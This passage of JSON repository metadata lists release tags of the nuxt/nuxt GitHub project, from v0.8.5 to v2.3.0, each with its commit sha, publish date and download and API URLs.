s_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.3/manifests"},{"name":"v2.3.0","sha":"dbf3ccc4c142083a76fbc4f3281f04e9b3044b79","kind":"commit","published_at":"2018-10-17T21:35:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.0/manifests"},{"name":"v2.2.0","sha":"e3b72ded5c56b62ca25f180390a1d60ce8123b5b","kind":"tag","published_at":"2018-10-13T19:07:52.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.2.0/manifests"},{"name":"v2.1.0","sha":"fdb225fbeb452a421f1484e3a1a16f26952d386e","kind":"tag","published_at":"2018-09-30T16:28:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.1.0/manifests"},{"name":"v2.0.0","sha":"7a68e1dde17e0ed7eb7598d9c63ca1ac2383b76e","kind":"commit","published_at":"2018-09-20T21:57:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.0.0/manifests"},{"name":"v1.4.2","sha":"376dd35ba9465e1163a800bd0512654f68436b5f","kind":"tag","published_at":"2018-08-01T19:59:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.2/manifests"},{"name":"v1.4.1","sha":"5b7e27a1af4aa0d212766513693949f9d7917bd5","kind":"tag","published_at":"2018-06-06T13:01:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.1/manifests"},{"name":"v1.4.0","sha":"85b584693cd1e689406ad722b47735fa7d0faf26","kind":"tag","published_at":"2018-03-01T16:45:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.0/manifests"},{"name":"v1.3.0","sha":"1582df149d7f18402faa58c47e080e3f0cc52a16","kind":"tag","published_at":"2018-01-31T16:13:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.3.0/manifests"},{"name":"v1.2.1","sha":"f0bd9a573b3756a6f878b3964222679a8c58beaa","kind":"tag","published_at":"2018-01-26T12:24:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.1/manifests"},{"name":"v1.2.0","sha":"78494dac927681007ea6725b4548db8fd838ed16","kind":"tag","published_at":"2018-01-26T11:54:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.0/manifests"},{"name":"v1.1.1","sha":"6dce671498d0128662579cfb08dd7e3e67253261","kind":"tag","published_at":"2018-01-13T13:10:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.0/manifests"},{"name":"v1.1","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1/manifests"},{"name":"v1.0.1","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"b83d74588fa45018dd89bb6ab4b4305be7f6a50a","kind":"tag","published_at":"2018-01-08T16:07:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc11","sha":"034df15231fa7986cf626ccc48305a0ba0a6cba2","kind":"commit","published_at":"2017-09-07T12:53:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"e24b4a7cc59e1b56b2a748682aa9180cd881097f","kind":"commit","published_at":"2017-09-07T12:31:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"226a8701b4f18cf213adb8f474c052adf2376ded","kind":"commit","published_at":"2017-09-06T13:34:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"63bc512d73660986546bd2428649d0299a6a0abd","kind":"commit","published_at":"2017-08-30T16:36:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"138edc7bfdbc9617a3f4e245f9bd32d0fcfc3a2b","kind":"commit","published_at":"2017-08-29T12:04:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"b931dd40cea828021f3092d1e224053a1baacba0","kind":"commit","published_at":"2017-08-21T20:08:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"e34d9d69bb44301976e1ee78fcd454b904f7701a","kind":"commit","published_at":"2017-08-21T08:38:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc3","sha":"533c8a9fb66e105ae8175bf31bff4eede5d733e1","kind":"commit","published_at":"2017-08-13T19:12:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc4","sha":"533c8a9fb66e105ae8175bf31bff4eede5d733e1","kind":"commit","published_at":"2017-08-13T19:12:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc4/manifests"},{"name":"1.0.0-rc3","sha":"8563c0f05fca617eb296544ac1f84f96cf470c5f","kind":"commit","published_at":"2017-07-28T08:40:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/1.0.0-rc3","html_url":"https://github.com/nuxt/nuxt/releases/tag/1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/1.0.0-rc3/manifests"},{"name":"v1.0.0-alpha.4","sha":"d15a50f539e74a510353d06e9a247e5cec77850e","kind":"commit","published_at":"2017-06-06T12:57:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.4/manifests"},{"name":"v1.0.0-alpha.3","sha":"2f32d03f83de48fc13718815e38197446d538b5e","kind":"commit","published_at":"2017-06-04T12:11:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.3/manifests"},{"name":"v1.0.0-alpha2","sha":"03f2e133b140d78870971ad4eadd00f14c244a2c","kind":"commit","published_at":"2017-05-29T15:04:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha2/manifests"},{"name":"v1.0.0-alpha1","sha":"7f337cdadf6e2b7b4b1a2b9f549c19aac33a794d","kind":"commit","published_at":"2017-05-21T19:08:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha1/manifests"},{"name":"v0.10.7","sha":"5d4f2899110b061ca8e084354e1a8b400280df14","kind":"commit","published_at":"2017-04-29T23:31:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.7/manifests"},{"name":"v0.10.6","sha":"854e262445db60f8bfee2483e3e723b7be4dc35a","kind":"commit","published_at":"2017-04-17T13:58:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.6/manifests"},{"name":"v0.10.5","sha":"704ff5e5775736cfe0e7030cbdc0b9cc2cb198d3","kind":"commit","published_at":"2017-03-25T23:54:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.5/manifests"},{"name":"v0.10.4","sha":"5ff6424e09eb2262b975c9c544c57e681fbf7591","kind":"commit","published_at":"2017-03-25T18:03:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.4/manifests"},{"name":"v0.10.3","sha":"c9784651e9c482ad90ec9c39359ac9dfd1e199bf","kind":"commit","published_at":"2017-03-25T11:57:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"77439223cfb9d3c64928d8888113898f4b1fa5d3","kind":"commit","published_at":"2017-03-25T11:36:58.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"ea5881e64a797ded299740017391f36ea7f94e09","kind":"commit","published_at":"2017-03-25T02:41:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.1/manifests"},{"name":"v0.10.0","sha":"bfe62b7d71d4ac64a4d411a83cec808824082b4f","kind":"commit","published_at":"2017-03-24T18:05:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.0/manifests"},{"name":"v0.9.9","sha":"df04b959c219789621f1f4ce239fb2f64c069eee","kind":"commit","published_at":"2017-02-10T23:41:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.9/manifests"},{"name":"v0.9.8","sha":"e7f0200a58f17d429b00641d015e6f7f87f99fd0","kind":"commit","published_at":"2017-02-10T01:22:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.8/manifests"},{"name":"v0.9.7","sha":"8d17d20dba2a81072173c68fa774d7a49cae716a","kind":"commit","published_at":"2017-01-30T11:41:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.7/manifests"},{"name":"v0.9.6","sha":"1556787e0164bdb4b15542dedf32762c481f274c","kind":"commit","published_at":"2017-01-15T16:33:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.6/manifests"},{"name":"v0.9.5","sha":"42a3b007514eea3e87a4bd0c083dad6524ecfead","kind":"commit","published_at":"2016-12-27T16:07:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.5/manifests"},{"name":"v0.9.4","sha":"05be1ed6b12e7d88fe7adc2af5ed0568cf40ddb0","kind":"commit","published_at":"2016-12-25T20:15:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.4/manifests"},{"name":"v0.9.3","sha":"1fc685a88037fdac0b826d8d814fcd1c3b320fda","kind":"commit","published_at":"2016-12-24T18:00:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.3/manifests"},{"name":"v0.9.2","sha":"2a9519e7203004955ffc70f0c8f762e6afeb9816","kind":"commit","published_at":"2016-12-23T12:09:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.2/manifests"},{"name":"v0.9.1","sha":"baaaefbf2c76f362fd0be9f34c1444e439e8c746","kind":"commit","published_at":"2016-12-20T11:55:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.1/manifests"},{"name":"v0.9.0","sha":"004e21b929b901ae54d92abf339c51a9d666b373","kind":"commit","published_at":"2016-12-19T19:37:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.0/manifests"},{"name":"v0.8.8","sha":"803b21bf17a21bac5eb97d84de35fa7d08c3b73e","kind":"commit","published_at":"2016-12-09T19:10:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.8/manifests"},{"name":"v0.8.6","sha":"d482711cbe2a9f50a6a4804bdf1292739dd581ab","kind":"commit","published_at":"2016-12-09T12:52:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.6/manifests"},{"name":"v0.8.5","sha":"151bd73b8250816c3918e52777e9a7387df7be4a","kind":"commit","published_at":"2016-12-09T12:46:59.000Z","download_url":"https://codeload.github.com/